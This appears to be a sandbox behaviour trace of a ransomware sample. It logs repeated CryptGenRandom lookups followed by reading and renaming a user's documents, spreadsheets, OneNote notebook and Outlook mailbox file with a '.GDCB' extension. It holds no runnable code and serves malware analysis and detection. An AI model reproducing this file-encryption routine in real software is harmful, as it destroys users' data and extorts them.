Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\bnQE.pps, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\bnQE.pps, size = 1048576, size_out = 99287 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\bnQE.pps, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\bnQE.pps.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\D6YOUnG.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\D6YOUnG.pptx, size = 1048576, size_out = 53417 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\D6YOUnG.pptx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\D6YOUnG.pptx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\l_9IL425VzhWVYOQGgg3.ots, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\l_9IL425VzhWVYOQGgg3.ots, size = 1048576, size_out = 84729 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\l_9IL425VzhWVYOQGgg3.ots, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\l_9IL425VzhWVYOQGgg3.ots.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\-5DB1ff.xls, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\-5DB1ff.xls, size = 1048576, size_out = 94285 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\-5DB1ff.xls, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\-5DB1ff.xls.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\CH63OfWwkwX.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\CH63OfWwkwX.odp, size = 1048576, size_out = 64378 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\CH63OfWwkwX.odp, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\CH63OfWwkwX.odp.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\k13Z0oU8.pps, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\k13Z0oU8.pps, size = 1048576, size_out = 26838 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\k13Z0oU8.pps, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\k13Z0oU8.pps.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\M4Gyy4ufrujRiwZd_-B.doc, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\M4Gyy4ufrujRiwZd_-B.doc, size = 1048576, size_out = 80208 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\M4Gyy4ufrujRiwZd_-B.doc, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\M4Gyy4ufrujRiwZd_-B.doc.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\sJuFZ-fNNCbjtR4EQ.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\sJuFZ-fNNCbjtR4EQ.odp, size = 1048576, size_out = 38925 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\sJuFZ-fNNCbjtR4EQ.odp, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\sJuFZ-fNNCbjtR4EQ.odp.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\TCfZ31T4.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\TCfZ31T4.pptx, size = 1048576, size_out = 59326 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\TCfZ31T4.pptx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\TCfZ31T4.pptx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\utrCoofyOdVwdhW.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\utrCoofyOdVwdhW.docx, size = 1048576, size_out = 91853 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\utrCoofyOdVwdhW.docx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\uNON\utrCoofyOdVwdhW.docx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\N1gDhnyQRsiczzqYbfB.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\N1gDhnyQRsiczzqYbfB.pptx, size = 1048576, size_out = 27190 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\N1gDhnyQRsiczzqYbfB.pptx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\N1gDhnyQRsiczzqYbfB.pptx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\niXUM m_uKc.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\niXUM m_uKc.xlsx, size = 1048576, size_out = 56030 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\niXUM m_uKc.xlsx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\niXUM m_uKc.xlsx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\oMlpnA 6XmkBTGxeBEL.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\oMlpnA 6XmkBTGxeBEL.pptx, size = 1048576, size_out = 100378 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\oMlpnA 6XmkBTGxeBEL.pptx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\oMlpnA 6XmkBTGxeBEL.pptx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\OneNote Notebooks\My Notebook\Quick Notes.one, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\OneNote Notebooks\My Notebook\Quick Notes.one, size = 1048576, size_out = 360136 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\OneNote Notebooks\My Notebook\Quick Notes.one, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\OneNote Notebooks\My Notebook\Quick Notes.one.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\OOwKqpIl7aYSv RTHK.xls, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\OOwKqpIl7aYSv RTHK.xls, size = 1048576, size_out = 26395 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\OOwKqpIl7aYSv RTHK.xls, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\OOwKqpIl7aYSv RTHK.xls.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst, size = 1048576, size_out = 271360 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\pPZcbKQB2 6KmBkrXgk.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\pPZcbKQB2 6KmBkrXgk.docx, size = 1048576, size_out = 17645 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\pPZcbKQB2 6KmBkrXgk.docx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\pPZcbKQB2 6KmBkrXgk.docx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\tKA0HHzsGkO.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\tKA0HHzsGkO.docx, size = 1048576, size_out = 94130 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\tKA0HHzsGkO.docx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\tKA0HHzsGkO.docx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\vWO_nHAQmsUVwAMd0Z82.ods, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\vWO_nHAQmsUVwAMd0Z82.ods, size = 1048576, size_out = 46708 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\vWO_nHAQmsUVwAMd0Z82.ods, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\vWO_nHAQmsUVwAMd0Z82.ods.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\we _xEQTC-XaBOe0W.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\we _xEQTC-XaBOe0W.docx, size = 1048576, size_out = 17479 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\we _xEQTC-XaBOe0W.docx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\we _xEQTC-XaBOe0W.docx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\68I4YY.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\68I4YY.rtf, size = 1048576, size_out = 55523 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\68I4YY.rtf, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\68I4YY.rtf.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\aD9d_LSzlGORTH_zOBw.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\aD9d_LSzlGORTH_zOBw.pdf, size = 1048576, size_out = 99485 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\aD9d_LSzlGORTH_zOBw.pdf, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\aD9d_LSzlGORTH_zOBw.pdf.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\J-grwbdBQV.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\J-grwbdBQV.rtf, size = 1048576, size_out = 14630 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\J-grwbdBQV.rtf, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\J-grwbdBQV.rtf.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\jMUwXrx_DL.pps, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\jMUwXrx_DL.pps, size = 1048576, size_out = 10868 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\jMUwXrx_DL.pps, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\jMUwXrx_DL.pps.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\QyXXAo4.doc, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\QyXXAo4.doc, size = 1048576, size_out = 68029 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\QyXXAo4.doc, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\QyXXAo4.doc.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\sZVcnxJx2O3Ea_92PnF.ods, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\sZVcnxJx2O3Ea_92PnF.ods, size = 1048576, size_out = 61898 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\sZVcnxJx2O3Ea_92PnF.ods, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\wU6cO4bxfsD-glD-SMu\sZVcnxJx2O3Ea_92PnF.ods.GDCB True 1
Fn
